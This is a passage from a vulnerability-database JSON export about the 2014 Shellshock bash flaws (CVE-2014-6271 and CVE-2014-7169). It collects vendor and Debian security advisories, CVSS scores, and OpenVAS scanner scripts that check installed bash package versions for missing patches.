reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: Encryption Desktop 10.3.2 &#40;Build 15337&#41;\r\nCharset: utf-8\r\n\r\nwj8DBQFUK2DqDEcm8Vbi9kMRAg4rAJ9wKbbbxeD3cagCry7GGfR4fVLpDwCeMqYm\r\nSfX/140WMvqvcmkPX2chR9s=\r\n=1KVR\r\n-----END PGP SIGNATURE-----\r\n\r\n", "cvss3": {}, "published": "2014-10-05T00:00:00", "type": "securityvulns", "title": "NEW VMSA-2014-0010 - VMware product updates address critical Bash security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2014-10-05T00:00:00", "id": "SECURITYVULNS:DOC:31131", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31131", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nMITRE is currently using CVE-2014-7169 to track the report of the\r\nincomplete patch, i.e., incorrect function parsing that&#39;s present in\r\nbuilds that are up-to-date with the\r\nhttp://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-025 changes. We\r\nrealize that other people may be releasing further information about\r\nthe technical details and implications later. CVE-2014-7169 expresses\r\nthe affected upstream versions as &quot;GNU Bash through 4.3 bash43-025&quot; --\r\nin general, this would include distribution packages released earlier\r\ntoday &#40;2014-09-24&#41;.\r\n\r\n- -- \r\nCVE assignment team, MITRE CVE Numbering Authority\r\nM/S M300\r\n202 Burlington Road, Bedford, MA 01730 USA\r\n[ PGP key available through http://cve.mitre.org/cve/request_id.html ]\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.14 &#40;SunOS&#41;\r\n\r\niQEcBAEBAgAGBQJUI3DaAAoJEKllVAevmvms+/kH/32ZGjC+BSqKoz6ZBUCMLnQ2\r\n+Li91/GvD0Rs8bqKPDsz30spiJR57ZluKMrlxJrlIffiHqAFiYkQ3+JXmnK/HAnA\r\nOtgToNtZ+1BV2jPrjXhuy2h+E5paTXMhM0T12xaUo89vtE7oer4Pld4JDqreXSSk\r\n1Nfu5AaGcvbBmwaNRn1qw+nARw0CFPmMRa169jQAesAAcyNx8V7IPgFpPj4K4S8c\r\n0zKXVdhIZxXvPcdZ5QzXKhcluOyOl1dJsjXR1qXT03QJsvhRighqb/3dZy+4mLyl\r\nJWhDfs7l8XXGCzbF8eSg2CNBpTGy1d/32F7YqaKj53xWFWyktHtbk4nJ5hlPlKU=\r\n=E9tp\r\n-----END PGP SIGNATURE-----\r\n\r\n", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "securityvulns", "title": "[oss-security] Re: CVE-2014-6271: remote code execution through bash", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2014-09-25T00:00:00", "id": "SECURITYVULNS:DOC:31106", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31106", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2021-10-23T22:37:18", "description": "Package : bash\nVersion : 4.1-3+deb6u2\nCVE ID : CVE-2014-7169\nDebian Bug : 762760 762761\n\nTavis Ormandy discovered that the patch applied to fix CVE-2014-6271\nreleased in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169). With this update prefix and suffix\nfor environment variable names which contain shell functions are added\nas hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat&#x27;s internal analysis for these\nissues and also independently reported by Todd Sabin.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-09-25T22:35:21", "type": "debian", "title": "[SECURITY] [DLA 63-1] bash security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-25T22:35:21", "id": "DEBIAN:DLA-63-1:7012F", "href": "https://lists.debian.org/debian-lts-announce/2014/09/msg00020.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-02T16:25:06", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3035-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nSeptember 25, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : bash\nCVE ID : CVE-2014-7169\nDebian Bug : 762760 762761\n\nTavis Ormandy discovered that the patch applied to fix CVE-2014-6271\nreleased in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169). With this update prefix and suffix\nfor environment variable names which contain shell functions are added\nas hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat&#x27;s internal analysis for these\nissues and also independently reported by Todd Sabin.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 4.2+dfsg-0.1+deb7u3.\n\nWe recommend that you upgrade your bash packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2014-09-25T21:18:46", "type": "debian", "title": "[SECURITY] [DSA 3035-1] bash security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-25T21:18:46", "id": "DEBIAN:DSA-3035-1:8A617", "href": "https://lists.debian.org/debian-security-announce/2014/msg00223.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-21T23:03:37", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3035-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nSeptember 25, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : bash\nCVE ID : CVE-2014-7169\nDebian Bug : 762760 762761\n\nTavis Ormandy discovered that the patch applied to fix CVE-2014-6271\nreleased in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169). With this update prefix and suffix\nfor environment variable names which contain shell functions are added\nas hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat&#x27;s internal analysis for these\nissues and also independently reported by Todd Sabin.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 4.2+dfsg-0.1+deb7u3.\n\nWe recommend that you upgrade your bash packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-09-25T21:18:46", "type": "debian", "title": "[SECURITY] [DSA 3035-1] bash security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-25T21:18:46", "id": "DEBIAN:DSA-3035-1:AEAF0", "href": "https://lists.debian.org/debian-security-announce/2014/msg00223.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-02T16:25:16", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3032-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nSeptember 24, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : bash\nCVE ID : CVE-2014-6271\n\nStephane Chazelas discovered a vulnerability in bash, the GNU\nBourne-Again Shell, related to how environment variables are\nprocessed. In many common configurations, this vulnerability is\nexploitable over the network, especially if bash has been configured\nas the system shell.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 4.2+dfsg-0.1+deb7u1.\n\nWe recommend that you upgrade your bash packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2014-09-24T14:06:06", "type": "debian", "title": "[SECURITY] [DSA 3032-1] bash security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271"], "modified": "2014-09-24T14:06:06", "id": "DEBIAN:DSA-3032-1:EB739", "href": "https://lists.debian.org/debian-security-announce/2014/msg00220.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:37:35", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "CentOS Update for bash CESA-2014:1306 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310882031", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882031", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bash CESA-2014:1306 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882031\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:58:09 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for bash CESA-2014:1306 centos6\");\n script_tag(name:\"insight\", value:\"The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. For more information see the Knowledgebase article at the linked references.\n\nNote: Docker users are advised to use 'yum update' within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"bash on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"CESA\", value:\"2014:1306\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-September/020593.html\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1200223\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.1.2~15.el6_5.2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.1.2~15.el6_5.2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-08-02T10:48:56", "description": "Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169 \n). With this update prefix and suffix\nfor environment variable names which contain shell functions are added\nas hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3035-1 (bash - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2017-07-18T00:00:00", "id": "OPENVAS:703035", "href": "http://plugins.openvas.org/nasl.php?oid=703035", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3035.nasl 6750 2017-07-18 09:56:47Z teissa $\n# Auto-generated from advisory DSA 3035-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703035);\n script_version(\"$Revision: 6750 $\");\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_name(\"Debian Security Advisory DSA 3035-1 (bash - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-18 11:56:47 +0200 (Tue, 18 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 17:00:22 +0530 (Wed, 01 Oct 2014)\");\n script_tag(name: \"cvss_base\", value:\"10.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3035.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"bash on Debian Linux\");\n script_tag(name: \"insight\", value: \"Bash is an sh-compatible command language interpreter that executes\ncommands read from the standard input or from a file. Bash also\nincorporates useful features from the Korn and C shells (ksh and csh).\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy), these problems have been fixed in\nversion 4.2+dfsg-0.1+deb7u3.\n\nWe recommend that you upgrade your bash packages.\");\n script_tag(name: \"summary\", value: \"Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169 \n). With this update prefix and suffix\nfor environment variable names which contain shell functions are added\nas hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat's internal analysis for these\nissues and also independently reported by Todd Sabin.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:32", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "CentOS Update for bash CESA-2014:1306 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310882033", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882033", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bash CESA-2014:1306 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882033\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 17:00:17 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for bash CESA-2014:1306 centos5\");\n script_tag(name:\"insight\", value:\"The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. For more information see the Knowledgebase article at the linked references.\n\nNote: Docker users are advised to use 'yum update' within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"bash on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"CESA\", value:\"2014:1306\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-September/020591.html\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1200223\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~33.el5_10.4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:39", "description": "This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.", "cvss3": {}, "published": "2014-10-08T00:00:00", "type": "openvas", "title": "GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2018-11-27T00:00:00", "id": "OPENVAS:1361412562310802082", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802082", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bash_shellshock_credential_cmd_exec_vuln_02.nasl 12551 2018-11-27 14:35:38Z cfischer $\n#\n# GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 02\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:gnu:bash\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802082\");\n script_version(\"$Revision: 12551 $\");\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", 